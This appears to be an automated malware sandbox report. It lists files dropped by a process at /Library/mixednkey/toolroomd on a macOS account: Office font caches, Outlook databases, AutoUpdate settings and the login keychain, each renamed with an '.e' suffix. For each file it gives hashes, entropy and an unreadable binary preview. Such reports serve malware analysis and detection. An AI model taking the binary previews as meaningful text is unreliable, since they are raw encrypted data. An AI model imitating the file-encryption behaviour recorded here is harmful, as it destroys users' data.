.3.O...S..h.%..+.X.....$i..M.......)L.s......Y...R...x.)....p6......"*~..svO.....<.cuS.zc.;......=....tL........).I.....,+.V......cK.....1'.;%.Y5'...^.@.._..."..F.V^.G...x.9..\i?r...+`....{.=S_[.....F.....'..F-..o0.)"....Y.7......7....d..3..4.?.y!..X...W'c.`/+O..SL..BBi.v.d......\,.0.G\|.......K..^..Q'..WJ.......5.../...y-95lT.....\|..y...On.K.{t6..o.e..

/Users/berri/Library/Group Containers/UBF8T346G9.Office/FontCache/4/Catalog/.ListAll_hier.Json.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	226999
Entropy (8bit):	7.971882940849264
Encrypted:	false
SSDEEP:	3072:vfJjKuGWE5299/pjMcntcp/nC71gjD2hr0N4lTMHMQZX/AnWGDkju1h:vxG7WB9/pAMcpqSnMlT9QZX9y1h
MD5:	36D92C453908A3535CBC6C21E32B017B
SHA1:	F91E5FB0F745F8EE05B949A2C3E1752BDB42D334
SHA-256:	3BE8DCF964CF09B9AD8A7D041EDB17AE85A4F34C2402D1C549041B332E626A72
SHA-512:	7888AEF2C8CBCF121C2611712F3EB0DE2CA6B8C9BF196CED0F9AB556FBB5AD09F62961BFC0774538B8DB8B1FC10B4B183A1F994C3CD86B5C89D063A63488C750
Malicious:	false
Preview:	t7...G..F.2..[.>...J.t..Ir04;..A..;+7..Vn.....6T....Np....7._..\...:}.....1.v..\|~@h..w.OK.....}zgT:.[.h..-.l....c..7..6D.v..\|~@.E.O......Ej....WL(J..v..\|~@.Z-.i.+..\.......dS..(.s2(V.<.R/..aU.]/...&.wQ.....$....F...D..u.n..)=. ...@=...3.\;...1>.u#.0M.....H\b.d........xO..Z0.J......}zg...[....-.l....c..7..6DRl.\..A{0...~.?eP.=..K.....v......A.'.'..N..{...v.B..N..".Jx..R.._vy.6.h.q..].l..xvyl.s.....L.9.x....@>...0]......v.\4..&==4V=N.%.cH..s..XK.i.-.9..1$"...-..N.....F......v..\|~@k..o4s...f..>...s....a..-3...l`Q-.J..\.k/%.....7..U.-..`nm...^...2.......+Rh..\s.hhi.luY....Vc.7.=..Yn...>.......I.r(Lu...........'.......U...Y.k.'.jj...Q..\|./5M.`a.p/.z......S.5,......~.S...;.........qh..w.OK.....}zg.mG...BE-.l....c..7..6D.........!x....)G....*....E%._.Z(.?....p.\|.]q........q.........s..Vnb....e.......}zg.I.....z-.l....c..7..6D............pP.D..$.@........Z...T..2.uQGj.$H...d...o-.J..\.k..i...9..TW.p.nm...^..#.M..T......NR..s.hhi.luY....Vc

/Users/berri/Library/Group Containers/UBF8T346G9.Office/FontCache/4/PreviewFont/.hier_officeFontsPreview.ttf.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1295593
Entropy (8bit):	7.99963086813244
Encrypted:	true
SSDEEP:	24576:jrjGwhDeX0+dLioeuKmdcH+5ww6mBBrGTdCr4/l4Mzmxb50/gUS3ucTAkKb:SIDypdn3GeihqGT40/36xbu/hSFTAp
MD5:	838D9D6327AD4726EF00628BA21724BB
SHA1:	5E8E28493590427CFE7AC935848775C245A279F7
SHA-256:	03702902A0219525EDDEF677D0F28FFF8E2C57BB3EBC73BF60747939E133A117
SHA-512:	B517571EC7737106458C5AEB73F1DA29D2D10505A67ABB5FF906C887B4270AB7A4C2FB2222678C52F240856A9E94FFD63C110068D8133177D531E40F755C9B09
Malicious:	false
Preview:	.d...\|.w\|..P.Da.0 ..OTG...1...Q.....}.b..F[j^W`.S7_..y.j..7..{.i..r\.-...M.AO...A_\|..~?.BW-..{.f'....V..1.x.....}.......Z.Em.}..o......,..&....{.4......<.K...S..(O..........W...N..x..............y..&B.....m..9a...]r..s\....6<.."a.......x..#.....(dx.3x.P6<.."a...Q.o0.. ..k.&.....@.c.\T{.~.>....c....1...g..f_i.C.o.6<.."a......fLw.r.g.e.bf......>....?\|......16<.."a.........-......s......j.y.!...z..K.}{.....%.`G......d.$..U!2&..~........M...K.4b1{......\|1t...f....@.pcN_.&-K....@...\.8....CH..}..5f....Q.c.....M.C....E.....h.i..b..'=..^G7.O.....1h..s...../t...F&M4j.i...i.. ..>...p...Y..B.H.v...1...:4..^..JH.6W...O....J.<?S..X....\M.:.x..9HV..9Bk..0....}3L...6.c..O....d..Gd=..R.)...;..<.....k..K..7ev}.#.^..;..-.`....7>.Xb.......}k....)..9.....f+....Qo....3y...A..R]....7[...}.<....^...c.r1.(XqD.s..a'.......TVd...3N..0...y.......N........7..A..n...".E..#.....6yU...Gxl.x1.*X...........6.x.E...@w.gu..U#.Z.l!.%.o..t{...lOi.IX...@...

/Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.BlockLocks.sqlite-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.3105325611557466
Encrypted:	false
SSDEEP:	24:Wa00RVaNgwQ0000000000000000000000000N000000000000000000000000003:t7NDNpq
MD5:	695FB00860AD885448164D72000433B2
SHA1:	ED528CBE3315042D66BB1B48BA6D14FAC4ACB21E
SHA-256:	39A0C757A33C323D85068BF92C20F941828BB6C2A52BE86DBBA3B11EC11B86FB
SHA-512:	8D0A0C7D9A1DB82D25B29CF1C82D3577CBB0931D69B897C38D5E7E405FA28F2A1B903DA68C50306B10DC1D2867A675AF82EBF839FB01B9E94EE9A98C7C79E7C4
Malicious:	false
Preview:	f...#D...z.Ydf].6<.."a..6<.."a..6<.."a........&f...#D...z.Ydf].6<.."a..t....Sq6<.."a........&6<.."a.....q.A"&...q.A"&6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.BlockLocks.sqlite-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.BlockLocks.sqlite.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	20803
Entropy (8bit):	3.616078323265516
Encrypted:	false
SSDEEP:	24:NBnaNHm0000000000000000000000000N000000000000000000000000000000u:zE3g53gt66Npq
MD5:	D010696E6C40FB0F9F13EA99CB2CFEF4
SHA1:	7365BDA04079DCA4F8A0BC24B35131C49DA7C2D0
SHA-256:	FC8E2B1CA7E55724EF5AEA16A900BE2ADA08AD119BB3713EF345B15587EA8AEF
SHA-512:	5185749B40A500A63F255A93ED2353B37FD1049ED818C292111632CBC9B8A12F8A1C62400154C5BEA3E8D128A200AF689CA68CC61185EEB6BE1D44E1C2654C5D
Malicious:	false
Preview:	..d.=..._t.........X..EA...+.36<.."a..Rf...a..6<.."a....7...x6<.."a..t....Sq6<.."a...}.Di..........Z...7..~F..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.Outlook.sqlite-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.420117374053762
Encrypted:	false
SSDEEP:	24:aW5XWlZv0Qjz+IsL000000000N000000000000000000000000000000N000000S:tgJ+IInJCNpq
MD5:	195084513372438178F6AA987DB5C8D1
SHA1:	C475E88C668885FA7197BDE123CC2AB2B98B00EB
SHA-256:	7DAFF30A4AB1287B53475567AD29817851045CF62C1370D8C574A64EB9119457
SHA-512:	54B994501DBD2430E9B68FED2407C7A59EEC7431E90DC62ACEFA9783F00FE8FCA1ECA28D5E6DB536ABA3352C7FF2959E54EB762A34B152FE982473112B784169
Malicious:	false
Preview:	f...#D....b..._.........X_.Q.g..m...iz.e..,.K.f...#D....b..._.........Bv..y..m...iz.e..,.K.6<.."a../..,..i...q.A"&6<.."a..6<.."a...\..u......."....p.....so...i.k...+.lX. ....!.e..JAn....2...h......;..?..qd.W<a..K......".......4\.:.0.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.Outlook.sqlite-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	111640
Entropy (8bit):	3.778074682281261
Encrypted:	false
SSDEEP:	96:XlIqTooPjwyPGzgKgBxX0/g60UMgF91Nqa762EknKke0n5NHzEmRoaCnkwLTghkb:JToCjwFWX9Uf1NqaPEIKD0nPjWkwL8H4
MD5:	420DD14F1F982B7D1DF83F9855C91006
SHA1:	C8EFB8E84C2562614CBED9496516BE8B686D3D85
SHA-256:	79F012C6CE92D7734A30C1BBE02F03C649F1906E26A645DAA70FC87064CD43F3
SHA-512:	1623E3B88CED4EC125B55B3CB2603D4E4A395EACEFBFA8011B7810CD89073B4CB4451ABB47C30E364C4E3EB2D8887476F0AB9F8597A4E61289394512126E4B37
Malicious:	false
Preview:	^u..o.F.47.W&.z..m...izM8c.Z...fW=.NT.S.m...iz.)._..9\.)..<...\.B.5.7.t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.Outlook.sqlite.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	463414
Entropy (8bit):	3.91506147637674
Encrypted:	false
SSDEEP:	1536:fqOBiOOcOOmqOB5qKOO+i/ja2QcOOcOOCHYAecOOcO46mtiVoQTnxYS0DH:fXEXzqTi+qHYA8iVoQTnxYSKH
MD5:	0D98326A3B7B1AA86ACF646A8ACCAEC3
SHA1:	D44E5D3FC951558E7F3D4FF982EE89BF2DEDFEF6
SHA-256:	03C62331230442A2EBE9EA249789A5F71B57C2C585C21934EC1610524D1BA401
SHA-512:	3E69D3103C3F72A8168F3359BD931DE8A3823A8DCBE28999ADF913349DF001CDA820031506BF6D217757CA7FE53EA76742436AB0E2EB1A88F53FFEF33FA8D993
Malicious:	false
Preview:	..d.=..._t.........X..E...._8K6<.."a......>l`6<.."a......C..6<.."a..t....Sq6<.."a...}.Di.d.hk...O..]g...:....8W...m.C.).`.V...6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a......ye....D.Yo. .\\|wW3.......d..........k.....z.x..j...U}7.E...>.-...r...R.....q..v;_...}..f6.........{}..vV10..b...M@..b.......T...T...Q......I?..U.Cy~K....R......;..Q.V`7{t'A8......M.........3.a..FpL.r=j.b.9....+..t..O.@C/;.C@!..N.'..c...H...l...Z....X.....1.T'...\|.C..\j..U.Cy~..x.A...W.o......Y....t.....u.........$.&.5..x.i.1..l..........:..^.X..:.x....j.d....q9}.Gh...'i^]._[5.R.....c.hP.\3.@;!G.Lq.,'..qC_....R8.N.K.?w..mX.O.I.(.'..Z.MO....G6..v.N.p...*sN...)Aa

/Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.RecordLocks.sqlite-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.3426453504816473
Encrypted:	false
SSDEEP:	24:OlyZaO0k0000000000000000000N000000000000000000000000000000N0000Z:OsZ5USNpq
MD5:	93211F029985C49E1D0AC20CBF0785DE
SHA1:	74D48C508ADA53CD65D942579E4EF4AC67C55A9D
SHA-256:	563D3C3E752B0CA8DE03D478AF19756BC8790A69B0A77B8922319C9542EEAA5B
SHA-512:	48E512BC1E872CF9F235C09B64885963DE934244BA246D856686DB62E8C4B364D11D4D58A54F70C07915F617371CAA9DABB5D1ED51C50BF354CAD656FD0D9690
Malicious:	false
Preview:	f...#D...R.08..P.K.~s.6.....q>_.P.o.I.W\...f...#D...R.08..P.K.~s..2._..>_.P.o.I.W\...6<.."a...%...[.....q.A"&6<.."a..6<.."a.....`......`......`......`...6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.RecordLocks.sqlite-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33324
Entropy (8bit):	3.4465122562598816
Encrypted:	false
SSDEEP:	24:1u000000000000000000000000000000N0000000000000000000000000000003:1t+1q7wqAHOqFHqJJqBqwGkgqS+QNpq
MD5:	CD36F35E0BFD817F128481B196403965
SHA1:	7E25D8AF0AA227F070EE0E6A86B8780EB78A3302
SHA-256:	1F2E55304C6F486043EA4E12F2CDF9934914F908D28B81D124644C08A434C317
SHA-512:	A9D6BEDE39D07B023F367CA920A91E12A9B32327D2E330FB8ADB99020BDEDC2CACE6CEDC92AC93174DA4A8BBC245E0E55D1F83FE551CCB1A1145E28AB434D800
Malicious:	false
Preview:	^u..o.F.47.W&.z.>_.P.o.vV.F...Rf...a..>_.P.o.Y.{.B..>.F..X.?...K..ut....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.RecordLocks.sqlite.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	16698
Entropy (8bit):	3.6637832451487973
Encrypted:	false
SSDEEP:	24:vBnaNxE0000000000000000000000000N000000000000000000000000000000Y:NoDMyqfCL8x6Axg/Npq
MD5:	DC9DDCE038239621A1C6F622B9B7A420
SHA1:	B821254257D51DA02019B51B976B5C19E01BAB09
SHA-256:	2FFD05E504CD9BCADC1BEE24E3CD51CFC5C18B4ED29CF9EE1E3A7B0F414AEED2
SHA-512:	F7EC0A69E555B7D9BDDBD39A88A6666AB1E1C3F2FFF7EC2232B712BC6A33C5B2F178D333AB38DA48CDDA3D5C51371199E9F5C8BB17AA799F9595E7B9FBD2B5A7
Malicious:	false
Preview:	..d.=..._t.........X..Rf...a..6<.."a..Rf...a..6<.."a....7...x6<.."a..t....Sq6<.."a...}.Di...IS8...7>v.PF.<.N[....6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Group Containers/UBF8T346G9.ms/.Microsoft AutoUpdate.MERP.params.txt.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Group Containers/UBF8T346G9.ms/.Microsoft Update Assistant.MERP.params.txt.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Group Containers/UBF8T346G9.ms/com.microsoft.autoupdate.fba/.ceippref.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	618
Entropy (8bit):	6.4413470424647326
Encrypted:	false
SSDEEP:	12:A57dZq6tBDjmeYqF9tEvBfPvVk0qN80/sewLYTc+qGm7:Al7q6/DjmeX9gfn48YsePc0m7
MD5:	87DE43637A9C3D76293441C95915DE10
SHA1:	F75D816EFAC00B6D0147C4CE1F993BDE4CDECE69
SHA-256:	BE91FC1DFD45E118C7F701B3E1FB9974BF349AC5D2854013733A38967549E840
SHA-512:	43001D52B784340059CC8A77837D6C88B636A7FB8FCCE86D7B2FC70F82B956198E07F9D5CD5D5C9D9094E89A3F28BEA4EACB702A1A1D5CDE616571C716193A14
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C.X.C..n.......=S.0..eN..I.q.1..(....M..{.S....Y......GM.Yj^........)5.Xg.}.fz}...I...]Z.`....~...91.m......m.......r..<;.v.q....9.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Keychains/.login.keychain-db.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	77526
Entropy (8bit):	7.90333894366141
Encrypted:	false
SSDEEP:	1536:/jGehkp4yOHr76qwJNPS55xJw8yFboPGnA:/bh03PS5PJZCbtnA
MD5:	03266640339A0970A70EEA420E48DF24
SHA1:	FCB8F7C0AA90D1DAE049338B01DEA04F32190A35
SHA-256:	44BCDBDA9576082B655A0976DF9217B6C7ACE5CBAEF213E8125349F2FB9DEBF1
SHA-512:	4C423B65F9C9E035FD069E2C7F1607AF148927F0C7694365F637D6E9C18CD40AC1CC27BA6F03C82B6CE5ECD213BF97A5D94D922F9AD8772E41C54C2FC5A9164C
Malicious:	false
Preview:	=mt.N2..J.!..C..yM...8.aV.gz~.P.GR.L.N#..0kae2.+......P:E...}C.98.0..#.\|lL0...C}.8,......n.....}.8,....q..........5..i..$ ..%;J..P..S.WJ..6...........7...x6<.."a....B...7u.....i.....\|..N..V.......gi...<.[.U......7...x6<.."a....B...7u..Awc8H.....\|..N..V.....q..2...EL.....T........6<.."a..k..G..)!_\.!@{..B..R9#.....n.$.Z\....&v.......q..bH.....7...x6<.."a....B...7uc.....C.....\|..N..V.....".......l..J.`.j.G..io.9..7...x6<.."a....B...7u.2:..o..?....J..7...x6<.."a....B...7us...4C.%..#.D.....7...x6<.."a....B...7uIlh$.;..C!".V<.D..7...x6<.."a....B...7u.......6QF..M..Z........7...x6<.."a....B...7u.A+T.m.....\|..N.....}.."...{...........v\4.B.6<.."a..k..G..)ZPfH_ngZ.o.I).4{.y.d.#..P.R.t.kT'j0.`...4$.h...U.....6<.."a..k..G..)....j]...C..D.y.d.#..=@Qo..9g.E....l..s..q.L...1$,......q.#..?'..d.;.n_.*P..m.&..aK%C..1.@...h...Y.n&.u.i.:.f.Q..I].F.L~n.......y}b"........e...9I..5...m.$1.